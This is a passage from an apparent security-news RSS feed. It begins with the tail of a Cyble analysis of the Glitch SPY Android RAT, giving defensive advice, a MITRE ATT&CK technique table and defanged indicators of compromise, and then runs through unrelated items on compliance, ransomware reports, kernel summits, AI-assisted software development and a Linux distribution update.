<p>Users should avoid installing APKs from outside official app stores. The loader's first action is requesting permission to install from unknown sources; denying it stops the payload before it installs.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Any app that requests Accessibility Service or installs from unknown sources should be treated as suspicious. Keep Google Play Protect enabled.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">Our Recommendations</h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>We have listed some essential <a href="https://cyble.com/knowledge-hub/what-is-cybersecurity/">cybersecurity</a> best practices that serve as the first line of defense against attackers. We recommend that our readers follow the best practices given below:</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li><strong>Install Apps Only from Trusted Sources:</strong><br>Download apps exclusively from official platforms, such as the <a href="https://cyble.com/blog/crypto-phishing-applications-on-the-play-store/">Google Play Store</a>. Avoid third-party app stores or links received via SMS, social media, or email.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li><strong>Be Cautious with Permissions and Installs:</strong><br>Never grant permissions and install an application unless you're certain of an app's legitimacy.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li><strong>Watch for Phishing Pages:</strong><br>Always verify the URL and avoid suspicious links and websites that ask for sensitive information.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li><strong>Enable Multi-Factor Authentication (MFA):</strong><br>Use MFA for banking and financial apps to add an extra layer of protection, even if credentials are compromised.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li><strong>Report Suspicious Activity:</strong><br>If you suspect you've been targeted or infected, report the incident to your bank and local authorities immediately. If necessary, reset your credentials and perform a factory reset.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li><strong>Use Mobile Security Solutions:</strong><br>Install a mobile security application that includes real-time scanning.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li><strong>Keep Your Device Updated:</strong><br> Ensure your Android OS and apps are updated regularly. Security patches often address vulnerabilities exploited by malware.</li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">MITRE ATT&amp;CK® Techniques</h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:table --></p>
<figure class="wp-block-table">
<table class="has-fixed-layout">
<tbody>
<tr>
<td><strong>Tactic</strong></td>
<td><strong>Technique ID</strong></td>
<td><strong>Procedure</strong></td>
</tr>
<tr>
<td>Initial Access (<a href="https://attack.mitre.org/tactics/TA0027">TA0027</a>)</td>
<td>Phishing (<a href="https://attack.mitre.org/techniques/T1660/">T1660</a>)</td>
<td>Glitch SPY is distributed via phishing sites</td>
</tr>
<tr>
<td>Persistence (<a href="https://attack.mitre.org/tactics/TA0028">TA0028</a>)</td>
<td>Event Triggered Execution: Broadcast Receivers (T1624.001)</td>
<td>Glitch SPY implemented a broadcast receiver for screen capturing</td>
</tr>
<tr>
<td>Defense Evasion (<a href="https://attack.mitre.org/tactics/TA0030">TA0030</a>)<strong></strong></td>
<td>Impair Defenses: Prevent Application Removal (T1629.001)</td>
<td>Prevent uninstalling application</td>
</tr>
<tr>
<td>Defense Evasion (<a href="https://attack.mitre.org/tactics/TA0030">TA0030</a>)<strong></strong></td>
<td>Hide Artifacts: Suppress Application Icon (<a href="https://attack.mitre.org/techniques/T1628/001/">T1628.001</a>)</td>
<td>Glitch SPY hides its icon</td>
</tr>
<tr>
<td>Defense Evasion (<a href="https://attack.mitre.org/tactics/TA0030">TA0030</a>)</td>
<td>Masquerading: Match Legitimate Name or Location (<a href="https://attack.mitre.org/techniques/T1655/001/">T1655.001</a>)</td>
<td>Glitch SPY masquerades as a Polish rental application</td>
</tr>
<tr>
<td>Defense Evasion (<a href="https://attack.mitre.org/tactics/TA0030">TA0030</a>)</td>
<td>Input Injection (T1516)</td>
<td>Glitch SPY can perform actions such as Clicks, swipes, gestures, and enter text into edit fields.</td>
</tr>
<tr>
<td>Credential Access (<a href="https://attack.mitre.org/tactics/TA0030">TA0030</a>)</td>
<td>Abuse Accessibility Features (<a href="https://attack.mitre.org/techniques/T1453/">T1453</a>)</td>
<td>Glitch SPY abuses Accessibility service</td>
</tr>
<tr>
<td><strong> </strong></td>
<td>Input Capture: Keylogging (<a href="https://attack.mitre.org/techniques/T1417/001/">T1417.001</a>)</td>
<td>Glitch SPY includes a Keylogging module  </td>
</tr>
<tr>
<td>Discovery (<a href="https://attack.mitre.org/tactics/TA0032">TA0032</a>)</td>
<td>Software Discovery  (<a href="https://attack.mitre.org/techniques/T1418/">T1418</a>)</td>
<td>Glitch SPY collects installed applications</td>
</tr>
<tr>
<td>Discovery (<a href="https://attack.mitre.org/tactics/TA0032">TA0032</a>)</td>
<td>File and Directory Discovery (<a href="https://attack.mitre.org/techniques/T1420/">T1420</a>)</td>
<td>Glitch SPY can enumerate files from external storage</td>
</tr>
<tr>
<td>Discovery (<a href="https://attack.mitre.org/tactics/TA0032">TA0032</a>)</td>
<td>Location Tracking (<a href="https://attack.mitre.org/techniques/T1430/">T1430</a>)</td>
<td>Glitch SPY can collect device location</td>
</tr>
<tr>
<td>Discovery (<a href="https://attack.mitre.org/tactics/TA0032">TA0032</a>)</td>
<td>System Information Discovery (<a href="https://attack.mitre.org/techniques/T1426/">T1426</a>)</td>
<td>Glitch SPY can collect device information</td>
</tr>
<tr>
<td>Collection (<a href="https://attack.mitre.org/tactics/TA0035">TA0035</a>)</td>
<td>Archive Collected Data (<a href="https://attack.mitre.org/techniques/T1532/">T1532</a>)  </td>
<td>Glitch SPY compresses the external storage directories as a zip file before sending</td>
</tr>
<tr>
<td>Collection (<a href="https://attack.mitre.org/tactics/TA0035">TA0035</a>)</td>
<td>Screen Capture (<a href="https://attack.mitre.org/techniques/T1513/">T1513</a>)</td>
<td>Glitch SPY captures screen content</td>
</tr>
<tr>
<td>Collection (<a href="https://attack.mitre.org/tactics/TA0035">TA0035</a>)</td>
<td>Audio Capture (<a href="https://attack.mitre.org/techniques/T1429/">T1429</a>)</td>
<td>Glitch SPY can capture Audio</td>
</tr>
<tr>
<td>Collection (<a href="https://attack.mitre.org/tactics/TA0035">TA0035</a>)</td>
<td>Clipboard Data (T1414)</td>
<td>Malware can monitor Clipboard content</td>
</tr>
<tr>
<td>Collection (<a href="https://attack.mitre.org/tactics/TA0035">TA0035</a>)</td>
<td>Data from Local System (<a href="https://attack.mitre.org/techniques/T1533/">T1533</a>)</td>
<td>Malware collects encrypted files from external storage</td>
</tr>
<tr>
<td>Collection (<a href="https://attack.mitre.org/tactics/TA0035">TA0035</a>)</td>
<td>Protected User Data: Contact List (<a href="https://attack.mitre.org/techniques/T1636/003/">T1636.003</a>)</td>
<td>Malware collects contact details</td>
</tr>
<tr>
<td>Collection (<a href="https://attack.mitre.org/tactics/TA0035">TA0035</a>)</td>
<td>Protected User Data: SMS Messages (<a href="https://attack.mitre.org/techniques/T1636/004/">T1636.004</a>)</td>
<td>Glitch SPY collects SMS data</td>
</tr>
<tr>
<td>Collection (<a href="https://attack.mitre.org/tactics/TA0035">TA0035</a>)</td>
<td>Protected User Data: Accounts (<a href="https://attack.mitre.org/techniques/T1636/005/">T1636.005</a>)</td>
<td>Malware collects Account information</td>
</tr>
<tr>
<td>Collection (<a href="https://attack.mitre.org/tactics/TA0035">TA0035</a>)</td>
<td>Protected User Data: Call Log (<a href="https://attack.mitre.org/techniques/T1636/002/">T1636.002</a>)</td>
<td>Glitch SPY collects Call logs</td>
</tr>
<tr>
<td>Command &amp; Control (<a href="https://attack.mitre.org/tactics/TA0037">TA0037</a>)</td>
<td>Application Layer Protocol (<a href="https://attack.mitre.org/techniques/T1437/">T1437</a>)</td>
<td>Glitch SPY communicates with C2 over TCP</td>
</tr>
<tr>
<td>Exfiltration (<a href="https://attack.mitre.org/tactics/TA0036">TA0036</a>)</td>
<td>Exfiltration Over C2 Channel (<a href="https://attack.mitre.org/techniques/T1646/">T1646</a>)</td>
<td>Glitch SPY exfiltrates data to the C&amp;C server</td>
</tr>
<tr>
<td>Impact (<a href="https://attack.mitre.org/tactics/TA0034">TA0034</a>)</td>
<td>Data Encrypted for Impact (<a href="https://attack.mitre.org/techniques/T1471/">T1471</a>)</td>
<td>Malware encrypts all the files present on the device with the .enc extension</td>
</tr>
<tr>
<td>Impact (<a href="https://attack.mitre.org/tactics/TA0034">TA0034</a>)</td>
<td>Data Destruction (<a href="https://attack.mitre.org/techniques/T1662/">T1662</a>)</td>
<td>Glitch SPY deletes all plain-text files after encryption</td>
</tr>
</tbody>
</table>
</figure>
<p><!-- /wp:table --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">Indicators of Compromise (IOCs)<strong></strong></h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:table --></p>
<figure class="wp-block-table">
<table class="has-fixed-layout">
<tbody>
<tr>
<td><strong>Indicators</strong></td>
<td><strong>Indicator type</strong></td>
<td><strong>Description</strong></td>
</tr>
<tr>
<td>hxxps://tutaj-dompl[.]com/Tutajdom.apk</td>
<td>URL</td>
<td>Distribution URL</td>
</tr>
<tr>
<td>sportypointsrewards[.]com</td>
<td>Domain</td>
<td>C&amp;C server</td>
</tr>
<tr>
<td>80af5e921cf8a3052fe4483bb2eb15953590e72ed003ac61c0b9135575c32075</td>
<td>FileHash-SHA256</td>
<td>Glitch SPY Hash</td>
</tr>
<tr>
<td>d439475bf09af7b474cdba2c19e136a1dd38e62b088537445ac3c8e4c2d3a8b1</td>
<td>FileHash-SHA256</td>
<td>Brokewell Loader</td>
</tr>
</tbody>
</table>
</figure>
<p><!-- /wp:table --></p>
<p>The post <a rel="nofollow" href="https://cyble.com/blog/glitch-spy-rat-distributed-via-fake-polish-app/">Glitch SPY: An Emerging Android RAT Distributed Through a Fake Polish Rental App</a> appeared first on <a rel="nofollow" href="https://cyble.com/">Cyble</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Half the defense base still builds security around compliance]]></title>
<description><![CDATA[CMMC requirements are appearing in defense contracts and moving down through supplier networks to thousands of companies new to this kind of compliance work. Many run on limited budgets with lean security teams. The picture comes from nearly 900 defense contractors, C3PAOs, federal suppliers, and...]]></description>
<link>https://tsecurity.de/de/3634518/it-security-nachrichten/half-the-defense-base-still-builds-security-around-compliance/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634518/it-security-nachrichten/half-the-defense-base-still-builds-security-around-compliance/</guid>
<pubDate>Tue, 30 Jun 2026 06:37:45 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>CMMC requirements are appearing in defense contracts and moving down through supplier networks to thousands of companies new to this kind of compliance work. Many run on limited budgets with lean security teams. The picture comes from nearly 900 defense contractors, C3PAOs, federal suppliers, and cybersecurity professionals who attended the 2026 Secureframe National Cybersecurity Summit. Where CMMC adoption stands Adoption varies across the defense industrial base. A small share have completed third-party certification at Level … <a href="https://www.helpnetsecurity.com/2026/06/30/federal-cybersecurity-compliance-report/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/06/30/federal-cybersecurity-compliance-report/">Half the defense base still builds security around compliance</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[From Bing Search to Ransomware: Bumblebee and AdaptixC2 Deliver Akira]]></title>
<description><![CDATA[Key Takeaways This case was first reported to customers in a threat brief released in July 2025 and in a public flash alert in August 2025 in partnership with Swisscom B2B CSIRT, which observed another intrusion tied to the same campaign. This report contains data from both intrusions. We plan to...]]></description>
<link>https://tsecurity.de/de/3633192/it-security-nachrichten/from-bing-search-to-ransomware-bumblebee-and-adaptixc2-deliver-akira/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3633192/it-security-nachrichten/from-bing-search-to-ransomware-bumblebee-and-adaptixc2-deliver-akira/</guid>
<pubDate>Mon, 29 Jun 2026 16:38:31 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Key Takeaways This case was first reported to customers in a threat brief released in July 2025 and in a public flash alert in August 2025 in partnership with Swisscom B2B CSIRT, which observed another intrusion tied to the same campaign. This report contains data from both intrusions. We plan to release a DFIR Labs […]</p>
<p>The post <a href="https://thedfirreport.com/2026/06/29/from-bing-search-to-ransomware-bumblebee-and-adaptixc2-deliver-akira-3/">From Bing Search to Ransomware: Bumblebee and AdaptixC2 Deliver Akira</a> appeared first on <a href="https://thedfirreport.com/">The DFIR Report</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[From Bing Search to Ransomware: Bumblebee and AdaptixC2 Deliver Akira]]></title>
<description><![CDATA[Key Takeaways This case was first reported to customers in a threat brief released in July 2025 and in a public flash alert in August 2025 in partnership with Swisscom B2B CSIRT, which observed another intrusion tied to the same…
Read more →
The post From Bing Search to Ransomware: Bumblebee and ...]]></description>
<link>https://tsecurity.de/de/3633181/it-security-nachrichten/from-bing-search-to-ransomware-bumblebee-and-adaptixc2-deliver-akira/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3633181/it-security-nachrichten/from-bing-search-to-ransomware-bumblebee-and-adaptixc2-deliver-akira/</guid>
<pubDate>Mon, 29 Jun 2026 16:38:17 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Key Takeaways This case was first reported to customers in a threat brief released in July 2025 and in a public flash alert in August 2025 in partnership with Swisscom B2B CSIRT, which observed another intrusion tied to the same…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/from-bing-search-to-ransomware-bumblebee-and-adaptixc2-deliver-akira-3/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/from-bing-search-to-ransomware-bumblebee-and-adaptixc2-deliver-akira-3/">From Bing Search to Ransomware: Bumblebee and AdaptixC2 Deliver Akira</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple Announces Its First Theatrical Movie Release of the Year]]></title>
<description><![CDATA[Apple has finally revealed its first cinematic event of the year that will hit the big screen. The tech company shared plans to bring the new historical drama film Tenzing to select movie theaters this fall. Fans who prefer watching great stories on the big screen will get a chance to see this st...]]></description>
<link>https://tsecurity.de/de/3629422/ios-mac-os/apple-announces-its-first-theatrical-movie-release-of-the-year/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3629422/ios-mac-os/apple-announces-its-first-theatrical-movie-release-of-the-year/</guid>
<pubDate>Sat, 27 Jun 2026 12:31:51 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple has finally revealed its first cinematic event of the year that will hit the big screen. The tech company shared plans to bring the new historical drama film Tenzing to select movie theaters this fall. Fans who prefer watching great stories on the big screen will get a chance to see this story unfold before it moves to digital streaming platforms a week later.



The company plans a limited theater run for award eligibility



The upcoming movie will arrive in a limited number of theaters starting on Friday, October 9. After a short exclusive run in cinemas, the film will become available to stream globally on the Apple TV app starting on October 16. This approach follows a familiar strategy used by streaming platforms to qualify their best projects for major industry awards. The Academy Awards require a movie to play in theaters for at least seven consecutive days to be considered for an Oscar.



Since the massive success of F1 last summer, the brand has kept all its new films on its digital service throughout 2026. This sudden shift back to cinemas shows the studio believes this new mountain climbing drama has a real chance to compete during the upcoming award season.



Here’s the plot summary:




"Based on true events, “Tenzing” chronicles the little-known story of Tenzing Norgay (Genden Phuntsok), a gifted Himalayan climber who, alongside New Zealand mountaineer Edmund Hillary (Tom Hiddleston), was the first to summit Mount Everest. Encouraged by his wife Dawa (Thinley Lhamo), Tenzing finds an ally in expedition secretary Jill Henderson (Caitríona Balfe). Together, they persuade Colonel John Hunt (Willem Dafoe) that Tenzing belongs on the British climbing team, rather than merely serving it. Where Western climbers see “Everest” as something to be conquered, Tenzing reveres “Chomolungma” as the sacred mother goddess. What follows is an ascent defined as much by the tensions between backgrounds, classes and competing ambitions as by the perils of the mountain itself. But high above the world, empire, rank and aspiration fall away, leaving two outsiders bound by mutual respect and trust - and for Tenzing, the fulfillment of both a lifelong dream and a spiritual calling. Directed by award-winning filmmaker Jennifer Peedom, “Tenzing” is a story of greatness that refuses to be diminished - and the love that makes it possible."




By securing a short theatrical window, the studio gives its newest historical epic a fair shot at critical recognition while still feeding fresh, high-quality content to its loyal streaming subscribers.]]></content:encoded>
</item>
<item>
<title><![CDATA[[$] Reports from OSPM 2026, day three]]></title>
<description><![CDATA[The Power Management
and Scheduling in the Linux Kernel Summit, which still goes by the
historical acronym OSPM, was held in Cambridge, UK, in mid-April.  As has
become traditional, the presenters at that event have since written
summaries of their sessions, and this work has kindly been made ava...]]></description>
<link>https://tsecurity.de/de/3628285/linux-tipps/reports-from-ospm-2026-day-three/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3628285/linux-tipps/reports-from-ospm-2026-day-three/</guid>
<pubDate>Fri, 26 Jun 2026 20:10:42 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The <a href="https://retis.santannapisa.it/ospm-summit/">Power Management
and Scheduling in the Linux Kernel Summit</a>, which still goes by the
historical acronym OSPM, was held in Cambridge, UK, in mid-April.  As has
become traditional, the presenters at that event have since written
summaries of their sessions, and this work has kindly been made available
to LWN for publication.  The third day's sessions covered a wide range of
topics, including GPU affinity, profile-guided scheduling,
paravirtualization scheduling, quality of service, and more.]]></content:encoded>
</item>
<item>
<title><![CDATA[[$] Initiating writeback earlier]]></title>
<description><![CDATA[Writeback is the process of ensuring that dirty pages or folios in the page
cache are flushed to the disk, so that changes to those files are made
persistent.  In a filesystem-track session at the 2026 Linux Storage,
Filesystem, Memory Management, and BPF Summit, Jeff Layton wanted to
discuss whe...]]></description>
<link>https://tsecurity.de/de/3628160/linux-tipps/initiating-writeback-earlier/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3628160/linux-tipps/initiating-writeback-earlier/</guid>
<pubDate>Fri, 26 Jun 2026 19:25:53 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Writeback is the process of ensuring that dirty pages or folios in the page
cache are flushed to the disk, so that changes to those files are made
persistent.  In a filesystem-track session at the 2026 <a href="https://events.linuxfoundation.org/lsfmmbpf/">Linux Storage,
Filesystem, Memory Management, and BPF Summit</a>, Jeff Layton wanted to
discuss whether the writeback operation should be initiated earlier than it
is today.  The consensus seemed to be that it should be done earlier, but
the path toward making that happen was less clear.]]></content:encoded>
</item>
<item>
<title><![CDATA[Early Bird pricing ends tonight for TechCrunch Founder Summit]]></title>
<description><![CDATA[Save up to $190 on your pass to TechCrunch Founder Summit 2026. Early Bird pricing ends today, at 11:59 p.m. PT, after which rates increase. Register now.]]></description>
<link>https://tsecurity.de/de/3627466/it-nachrichten/early-bird-pricing-ends-tonight-for-techcrunch-founder-summit/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3627466/it-nachrichten/early-bird-pricing-ends-tonight-for-techcrunch-founder-summit/</guid>
<pubDate>Fri, 26 Jun 2026 15:02:41 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Save up to $190 on your pass to TechCrunch Founder Summit 2026. Early Bird pricing ends today, at 11:59 p.m. PT, after which rates increase. Register now.]]></content:encoded>
</item>
<item>
<title><![CDATA[Most companies think they're building a software factory. They're actually just shipping bugs faster.]]></title>
<description><![CDATA[Industrialized factories changed how the world produced physical goods: more output, lower costs, faster than anything that came before. Now a similar shift is happening with software. LLMs have lowered the barrier to writing code, increased individual output, and pushed organizations to think ab...]]></description>
<link>https://tsecurity.de/de/3627334/it-nachrichten/most-companies-think-theyre-building-a-software-factory-theyre-actually-just-shipping-bugs-faster/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3627334/it-nachrichten/most-companies-think-theyre-building-a-software-factory-theyre-actually-just-shipping-bugs-faster/</guid>
<pubDate>Fri, 26 Jun 2026 14:17:19 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Industrialized factories changed how the world produced physical goods: more output, lower costs, faster than anything that came before. Now a similar shift is happening with software. </p><p>LLMs have lowered the barrier to writing code, increased individual output, and pushed organizations to think about software development as a production system. The standard software development lifecycle and CI/CD practices that have held for decades won't hold up under that pressure. That's where the software factory comes in — and like physical factories, it needs more than speed to actually work.</p><p>The idea of a “software factory” started to solidify over the past year. <a href="https://refactoring.fm/p/the-era-of-the-software-factory">Luca Rossi's "The Era of the Software Factory"</a> made the case plainly: AI is not just changing how fast people write code — it's changing the whole production system around software. </p><p>The concept can mean different things: a collection of coding agents and skills files; faster CI/CD; better review systems; or more automation around software delivery. A better frame is to think of it less as a tool category and more as a set of principles. A software factory can't just be a loose collection of prompts, agents, and plugins. It needs a platform that defines how work moves through the system and how code is generated, reviewed, tested, traced, deployed, and improved when something goes wrong.</p><p>Otherwise all you’re doing is putting yet another one-off machine into an empty room and calling it a factory. </p><h2>Why is this happening now?</h2><p>There are a few forces all hitting at the same time.</p><p>Companies have always wanted more software than engineers can produce. That’s why tools like Excel exist: They often fill in the gap for a lot of the software that many companies wish they could make.</p><p>AI has also lowered the barrier of entry to creating code, and this is the part everyone focuses on. Code creation is now easier, though not always cheaper or better, as evidenced by many high-profile companies <a href="https://fortune.com/article/why-is-the-cost-of-ai-higher-than-human-workers-nvidia-executive/">fretting over their high AI bills</a>. The barrier to writing functional code has effectively collapsed.</p><p>More importantly, a single engineer can generate more code than they could just a few years ago. That changes the bottleneck: it’s no longer “How fast can someone write this?” or even, in some cases, “Can someone understand how to code?” Instead it becomes, “Should this be written?” </p><p>More importantly, can we actually create end products that are durable and reliable and don’t just build tech debt? Or are we just putting out more AI slop faster than ever? That’s where the danger lies. </p><h2>The dangers of the modern software factory</h2><p>All of this sounds great. Factories, after all, made production faster and more consistent. </p><p>They made it possible to build more cars and products, less expensively, which led to more people being able to afford cars and products. Putting environmental impacts aside, you could argue this was positive.</p><p>But like many things in engineering, there are always tradeoffs, and in this case, there are new risks.</p><p>When you increase the output of one person with machinery, digital or otherwise, you also increase the mistakes that can be made either by the individual or the machinery. The speed at which code can now be put out is on an industrial scale. Even smaller organizations can suddenly have code bases ballooning up to the size of tech company code bases a decade ago. </p><p>The data is already showing problems. Faros AI found that while task throughput per developer is up 33.7% and PR merge rate is up 16.2%, the <a href="https://www.faros.ai/blog/ai-acceleration-whiplash-takeaways">incidents-to-PR ratio has risen 242.7%</a> and bugs per developer are up 54%. Google’s DORA research found that more AI adoption was actually <a href="https://dora.dev/ai/gen-ai-report/report/">associated with worse delivery stability</a>. </p><p>As a fractional head of data, I've been brought in to fix these exact issues. In the past year alone, I've worked on two projects where AI-generated data infrastructure slowly started to morph over time.</p><p>Between multiple engineers trying to move quickly and a lack of standards, these projects became unruly. Code bases tend to go through some level of evolution, but as different styles blend, the LLMs in turn start to create their own mutations. Codebases developed five to six different styles within months — a process that previously took years. <a href="https://seattledataguy.substack.com/p/layer-by-layer-we-built-data-systems">Layer by layer</a>, the engineers would slowly stop understanding exactly what was going on.</p><p>The pattern echoes what happened a decade ago with self-service tooling: early productivity gains that masked downstream complexity.</p><p>And that’s why the software factory can’t just be about speed. </p><h2>What makes a software factory work</h2><p>There are several key principles to consider when building a software factory.</p><p><b>Platform over tools: </b>Many teams are slowly implementing AI into their coding workflows at the edges — adding a PR review agent or a skills file into their repos. But building an actual software factory requires a platform, not a collection of tools at the edges. A platform provides a unified foundation where tools aren't scattered in separate corners. Instead, they actively share data, talk to each other, and work as a single cohesive system — standards, processes, and the work itself all connected. </p><p><b>Rerunability and traceability:</b> A real platform requires the ability to go back into any run, identify what went wrong, and rerun it — which is why one-off agents don't make a factory. The system needs to support taking a serial ID, looking it up, and tracing exactly how it got to the output it produced. This is why state machines make more sense than loops for AI workflows: they make it far easier to rerun a process and understand what happened at each step.</p><p><b>Safety and guardrails</b>: Factories are not safe places. Neither is a software factory. As more people develop on these platforms, <a href="https://medium.com/codestrap/ai-agents-need-better-guardrails-f4669c7b7254">better guardrails</a> and safety measures need to be built in. Testing and quality control need to be pushed to the front of the process — catching bugs at the lowest possible stage reduces the cost to fix them and limits the blast radius.</p><p><b>Standardization:</b> At the enterprise level, every codebase has its own flavor. Layering a code assistant on top without standards produces an amalgamation of styles. Standardization has to be built into the process from the start.</p><p><b>Quality control:</b> In older manufacturing models, quality control happened at the end of the line. The product was built, inspected, defects found, and fixed later. <a href="https://global.toyota/en/company/vision-and-philosophy/production-system/">Toyota's approach was different</a>. Quality was pushed into the process itself — workers were expected to stop the line when something was wrong. The goal wasn't to catch defects at the end; it was to prevent them from flowing downstream in the first place. </p><p>The same is true for the software factory. QC needs to be baked into the entire process, starting with how the spec is written. That means integrating static code analysis that catches obvious errors and providing templates to LLMs so they know the structure the code should follow. Without that, the bottleneck becomes the final review — or teams just push out more AI slop.</p><h2>Speed without quality isn't productivity</h2><p>Improving the speed of your code output is not actual productivity if the downstream issues aren’t managed. A company is not more productive because it produces millions of cars, only to see them all fall apart within 100 miles. It’s also not more productive if all it does is produce an endless stream of proofs-of-concept that never enter production. </p><p>Actual productivity is when the software factory takes ephemeral tokens and turns them into durable outputs. It's easy to talk about lines of code and how much faster your team is moving.</p><p>The software factory that wins isn't the one that generates the most code. It's the one that generates the fewest defects downstream.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[ZTE CDO Cui Li at GTI Summit 2026: Co-creating an intelligent, ubiquitous 6G future and exploring new opportunities in the mobile AI era]]></title>
<description><![CDATA[PARTNER CONTENT: ZTE’s Chief Development Officer outlines the company's "2+4" framework for 6G convergence and industry-wide collaboration in the mobile AI era]]></description>
<link>https://tsecurity.de/de/3627256/it-nachrichten/zte-cdo-cui-li-at-gti-summit-2026-co-creating-an-intelligent-ubiquitous-6g-future-and-exploring-new-opportunities-in-the-mobile-ai-era/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3627256/it-nachrichten/zte-cdo-cui-li-at-gti-summit-2026-co-creating-an-intelligent-ubiquitous-6g-future-and-exploring-new-opportunities-in-the-mobile-ai-era/</guid>
<pubDate>Fri, 26 Jun 2026 13:48:09 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[PARTNER CONTENT: ZTE’s Chief Development Officer outlines the company's "2+4" framework for 6G convergence and industry-wide collaboration in the mobile AI era]]></content:encoded>
</item>
<item>
<title><![CDATA[ZTE and GSMA announce co-location between ZTE Global Summit & User Congress and GSMA M360 ASEAN at MWC26 Shanghai]]></title>
<description><![CDATA[PARTNER CONTENT: ZTE becomes the Strategic Partner for GSMA's M360 ASEAN event, uniting global ICT leaders to accelerate regional digital economic growth and future network evolution]]></description>
<link>https://tsecurity.de/de/3627245/it-nachrichten/zte-and-gsma-announce-co-location-between-zte-global-summit-user-congress-and-gsma-m360-asean-at-mwc26-shanghai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3627245/it-nachrichten/zte-and-gsma-announce-co-location-between-zte-global-summit-user-congress-and-gsma-m360-asean-at-mwc26-shanghai/</guid>
<pubDate>Fri, 26 Jun 2026 13:47:55 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[PARTNER CONTENT: ZTE becomes the Strategic Partner for GSMA's M360 ASEAN event, uniting global ICT leaders to accelerate regional digital economic growth and future network evolution]]></content:encoded>
</item>
<item>
<title><![CDATA[[Stable Update] 2026-06-26 - Kernels, Systemd, PipeWire, NVIDIA, KDE, LibreOffice]]></title>
<description><![CDATA[Hello Manjaro user community, here we have another set of package updates. We are continuing our development of the upcoming release of ‘Bian-May’ which can be expected end of June, Mid of July. Development speed may be a little slower the upcoming weeks. However, still let us know any issues you...]]></description>
<link>https://tsecurity.de/de/3626452/unix-server/stable-update-2026-06-26-kernels-systemd-pipewire-nvidia-kde-libreoffice/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3626452/unix-server/stable-update-2026-06-26-kernels-systemd-pipewire-nvidia-kde-libreoffice/</guid>
<pubDate>Fri, 26 Jun 2026 08:16:20 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div data-theme-toc="true"> </div>
<p>Hello Manjaro user community, here we have another set of package updates. We are continuing our development of the upcoming release of ‘Bian-May’ which can be expected end of June, Mid of July. Development speed may be a little slower the upcoming weeks. However, still let us know any issues you may found thus far.</p>
<h3><a name="p-862931-current-promotions-1" class="anchor" href="https://forum.manjaro.org/#p-862931-current-promotions-1" aria-label="Heading link"></a>Current Promotions</h3>
<ul>
<li>Get the latest Gaming Laptop by Slimbook powered by Manjaro: <a href="https://slimbook.com/manjaro">Slimbook Manjaro III</a></li>
